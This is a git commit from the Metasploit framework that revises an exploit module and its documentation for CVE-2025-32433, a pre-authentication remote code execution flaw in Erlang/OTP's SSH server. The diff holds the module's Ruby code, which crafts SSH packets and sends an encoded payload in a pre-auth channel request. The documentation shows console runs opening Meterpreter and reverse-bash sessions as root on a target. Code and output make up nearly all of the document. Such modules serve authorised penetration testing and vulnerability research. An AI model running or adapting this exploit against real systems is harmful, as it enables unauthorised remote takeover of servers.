fixes review

mekhalleh · mekhalleh · commit 32a8e6797e14 · 2025-04-27T20:31:13.000+04:00
Signed-off-by: RAMELLA Sebastien &lt;sebastien.ramella@pirates.re&gt;
diff --git a/documentation/modules/exploit/linux/ssh/ssh_erlangotp_rce.md b/documentation/modules/exploit/linux/ssh/ssh_erlangotp_rce.md
@@ -49,12 +49,6 @@ docker run -d -p 2223:2223 patched-ssh:latest
 3. Do: `set RHOSTS [IP]`
 4. Do: `run`
 
-## Options
-
-**CHECK_ONLY**
-
-Only check for vulnerability without exploiting. Default: `false`
-
 ## Scenarios
 
 ### Using linux commands (Target 0)
@@ -66,12 +60,11 @@ msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options
 
 Module options (exploit/linux/ssh/ssh_erlangotp_rce):
 
-   Name        Current Setting  Required  Description
-   ----        ---------------  --------  -----------
-   CHECK_ONLY  false            no        Only check for vulnerability without exploiting
-   RHOSTS      172.20.7.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT       2222             yes       The target port (TCP)
-   THREADS     1                yes       The number of concurrent threads (max one per host)
+   Name       Current Setting      Required  Description
+   ----       ---------------      --------  -----------
+   RHOSTS     192.168.0.1          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      2222                 yes       The target port (TCP)
+   SSH_IDENT  SSH-2.0-OpenSSH_8.9  yes       SSH client identification string sent to the server
 
 Payload options (cmd/linux/https/x64/meterpreter/reverse_tcp):
 
@@ -84,14 +77,14 @@ Payload options (cmd/linux/https/x64/meterpreter/reverse_tcp):
    FETCH_SRVHOST                      no        Local IP to use for serving payload
    FETCH_SRVPORT     8080             yes       Local port to use for serving payload
    FETCH_URIPATH                      no        Local URI to use for serving payload
-   LHOST             172.20.7.45      yes       The listen address (an interface may be specified)
+   LHOST             192.168.0.1      yes       The listen address (an interface may be specified)
    LPORT             4444             yes       The listen port
 
    When FETCH_FILELESS is false:
 
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
-   FETCH_FILENAME      fxCcJWmo         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_FILENAME      tVzpeXtmX        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
    FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
 
 Exploit target:
@@ -103,15 +96,21 @@ Exploit target:
 View the full module info with the info, or info -d command.
 
 msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
-[*] Started reverse TCP handler on 172.20.7.45:4444 
-[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Starting exploit for CVE-2025-32433
-[+] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
-[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_KEXINIT...
-[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_CHANNEL_OPEN...
-[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Payload sent successfully
+[*] Started reverse TCP handler on 192.168.0.1:4444 
+[*] 192.168.0.1:2222 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.0.1:2222 - Starting scanner for CVE-2025-32433
+[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.0.1:2222 - The target is vulnerable.
+[*] 192.168.0.1:2222 - Starting exploit for CVE-2025-32433
+[+] 192.168.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.0.1:2222 - Payload sent successfully
 [*] Sending stage (3045380 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (172.20.7.45:4444 -> 172.17.0.2:37326) at 2025-04-25 10:18:19 +0400
+[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 172.17.0.2:35770) at 2025-04-27 20:23:02 +0400
 
 meterpreter > 
 ```
@@ -125,18 +124,17 @@ msf6 exploit(linux/ssh/ssh_erlangotp_rce) > options
 
 Module options (exploit/linux/ssh/ssh_erlangotp_rce):
 
-   Name        Current Setting  Required  Description
-   ----        ---------------  --------  -----------
-   CHECK_ONLY  false            no        Only check for vulnerability without exploiting
-   RHOSTS      172.20.7.45      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT       2222             yes       The target port (TCP)
-   THREADS     1                yes       The number of concurrent threads (max one per host)
+   Name       Current Setting      Required  Description
+   ----       ---------------      --------  -----------
+   RHOSTS     192.168.0.1          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      2222                 yes       The target port (TCP)
+   SSH_IDENT  SSH-2.0-OpenSSH_8.9  yes       SSH client identification string sent to the server
 
 Payload options (cmd/unix/reverse_bash):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  172.20.7.45      yes       The listen address (an interface may be specified)
+   LHOST  192.168.0.1      yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 Exploit target:
@@ -148,14 +146,20 @@ Exploit target:
 View the full module info with the info, or info -d command.
 
 msf6 exploit(linux/ssh/ssh_erlangotp_rce) > run
-[*] Started reverse TCP handler on 172.20.7.45:4444 
-[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Starting exploit for CVE-2025-32433
-[+] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
-[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_KEXINIT...
-[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_CHANNEL_OPEN...
-[*] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
-[+] 172.20.7.45:2222      - ssh://172.20.7.45:2222 - Payload sent successfully
-[*] Command shell session 13 opened (172.20.7.45:4444 -> 172.17.0.2:44366) at 2025-04-25 10:21:05 +0400
+[*] Started reverse TCP handler on 192.168.0.1:4444 
+[*] 192.168.0.1:2222 - Running automatic check ("set AutoCheck false" to disable)
+[*] 192.168.0.1:2222 - Starting scanner for CVE-2025-32433
+[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.0.1:2222 - The target is vulnerable.
+[*] 192.168.0.1:2222 - Starting exploit for CVE-2025-32433
+[+] 192.168.0.1:2222 - Received banner: SSH-2.0-Erlang/5.1.4.7
+[*] 192.168.0.1:2222 - Sending SSH_MSG_KEXINIT...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_OPEN...
+[*] 192.168.0.1:2222 - Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...
+[+] 192.168.0.1:2222 - Payload sent successfully
+[*] Command shell session 1 opened (192.168.0.1:4444 -> 172.17.0.2:59042) at 2025-04-27 20:24:41 +0400
 
 whoami
 root
diff --git a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb
@@ -5,8 +5,9 @@
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::Tcp
-  include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
@@ -45,6 +46,7 @@ def initialize(info = {})
               'Type' => :linux_cmd,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/linux/https/x64/meterpreter/reverse_tcp'
+                # cmd/linux/http/aarch64/meterpreter/reverse_tcp has also been tested successfully with this module.
               }
             }
           ],
@@ -59,19 +61,20 @@ def initialize(info = {})
             }
           ]
         ],
-        'Privileged' => false,
+        'Privileged' => true,
         'DisclosureDate' => '2025-04-16',
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+          'SideEffects' => [IOC_IN_LOGS]
         }
       )
     )
 
     register_options([
-      OptBool.new('CHECK_ONLY', [false, 'Only check for vulnerability without exploiting', false])
+      Opt::RPORT(22),
+      OptString.new('SSH_IDENT', [true, 'SSH client identification string sent to the server', 'SSH-2.0-OpenSSH_8.9'])
     ])
   end
 
@@ -95,7 +98,7 @@ def build_channel_request(channel_id, command)
 
   # builds a minimal but valid SSH_MSG_KEXINIT packet
   def build_kexinit
-    cookie = "\x00" * 16
+    cookie = SecureRandom.random_bytes(16)
     "\x14" +
       cookie +
       name_list(
@@ -115,10 +118,6 @@ def build_kexinit
       [0].pack('N')
   end
 
-  def message(msg)
-    "ssh://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
-  end
-
   # formats a list of names into an SSH-compatible string (comma-separated)
   def name_list(names)
     string_payload(names.join(','))
@@ -142,112 +141,100 @@ def string_payload(str)
     [s_bytes.length].pack('N') + s_bytes
   end
 
-  def check_host(target_host)
-    print_status(message('Starting scanner for CVE-2025-32433'))
+  def check
+    print_status('Starting scanner for CVE-2025-32433')
 
     connect
-    sock.put("SSH-2.0-OpenSSH_8.9\r\n")
+    sock.put("#{datastore['SSH_IDENT']}\r\n")
     banner = sock.get_once(1024, 10)
     unless banner
-      print_status(message('No banner received'))
-      return Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Unknown('No banner received')
     end
 
     unless banner.to_s.downcase.include?('erlang')
-      print_status(message("Not an Erlang SSH service: #{banner.strip}"))
-      return Exploit::CheckCode::Safe
+      return Exploit::CheckCode::Safe("Not an Erlang SSH service: #{banner.strip}")
     end
+
     sleep(0.5)
 
-    print_status(message('Sending SSH_MSG_KEXINIT...'))
+    print_status('Sending SSH_MSG_KEXINIT...')
     kex_packet = build_kexinit
     sock.put(pad_packet(kex_packet, 8))
     sleep(0.5)
 
     response = sock.get_once(1024, 5)
     unless response
-      print_status(message("Detected Erlang SSH service: #{banner.strip}, but no response to KEXINIT"))
-      return Exploit::CheckCode::Detected
+      return Exploit::CheckCode::Detected("Detected Erlang SSH service: #{banner.strip}, but no response to KEXINIT")
     end
 
-    print_status(message('Sending SSH_MSG_CHANNEL_OPEN...'))
+    print_status('Sending SSH_MSG_CHANNEL_OPEN...')
     chan_open = build_channel_open(0)
     sock.put(pad_packet(chan_open, 8))
     sleep(0.5)
 
-    print_status(message('Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...'))
+    print_status('Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...')
     chan_req = build_channel_request(0, Rex::Text.rand_text_alpha(rand(4..8)).to_s)
     sock.put(pad_packet(chan_req, 8))
     sleep(0.5)
 
     begin
       sock.get_once(1024, 5)
     rescue EOFError, Errno::ECONNRESET
-      print_error(message('The target is not vulnerable to CVE-2025-32433.'))
-      return Exploit::CheckCode::Safe
+      return Exploit::CheckCode::Safe('The target is not vulnerable to CVE-2025-32433.')
     end
     sock.close
 
-    note = 'The target is vulnerable to CVE-2025-32433.'
-    print_good(message(note))
     report_vuln(
-      host: target_host,
+      host: datastore['RHOST'],
       name: name,
       refs: references,
-      info: note
+      info: 'The target is vulnerable to CVE-2025-32433.'
     )
     Exploit::CheckCode::Vulnerable
   rescue Rex::ConnectionError
-    print_error(message('Failed to connect to the target'))
-    Exploit::CheckCode::Unknown
+    Exploit::CheckCode::Unknown('Failed to connect to the target')
   rescue Rex::TimeoutError
-    print_error(message('Connection timed out'))
-    Exploit::CheckCode::Unknown
+    Exploit::CheckCode::Unknown('Connection timed out')
   ensure
     disconnect unless sock.nil?
   end
 
   def exploit
-    if datastore['CHECK_ONLY']
-      check_host(datastore['RHOST'])
-      return
-    end
-
-    print_status(message('Starting exploit for CVE-2025-32433'))
+    print_status('Starting exploit for CVE-2025-32433')
     connect
     sock.put("SSH-2.0-OpenSSH_8.9\r\n")
     banner = sock.get_once(1024)
     if banner
-      print_good(message("Received banner: #{banner.strip}"))
+      print_good("Received banner: #{banner.strip}")
     else
       fail_with(Failure::Unknown, 'No banner received')
     end
     sleep(0.5)
 
-    print_status(message('Sending SSH_MSG_KEXINIT...'))
+    print_status('Sending SSH_MSG_KEXINIT...')
     kex_packet = build_kexinit
     sock.put(pad_packet(kex_packet, 8))
     sleep(0.5)
 
-    print_status(message('Sending SSH_MSG_CHANNEL_OPEN...'))
+    print_status('Sending SSH_MSG_CHANNEL_OPEN...')
     chan_open = build_channel_open(0)
     sock.put(pad_packet(chan_open, 8))
     sleep(0.5)
 
-    print_status(message('Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...'))
+    print_status('Sending SSH_MSG_CHANNEL_REQUEST (pre-auth)...')
     chan_req = build_channel_request(0, payload.encoded)
     sock.put(pad_packet(chan_req, 8))
 
     begin
       response = sock.get_once(1024, 5)
       if response
-        vprint_status(message("Received response: #{response.unpack('H*').first}"))
-        print_good(message('Payload sent successfully'))
+        vprint_status("Received response: #{response.unpack('H*').first}")
+        print_good('Payload sent successfully')
       else
-        print_status(message('No response within timeout period (which is expected)'))
+        print_status('No response within timeout period (which is expected)')
       end
     rescue Rex::TimeoutError
-      print_status(message('No response within timeout period (which is expected)'))
+      print_status('No response within timeout period (which is expected)')
     end
     sock.close
   rescue Rex::ConnectionError
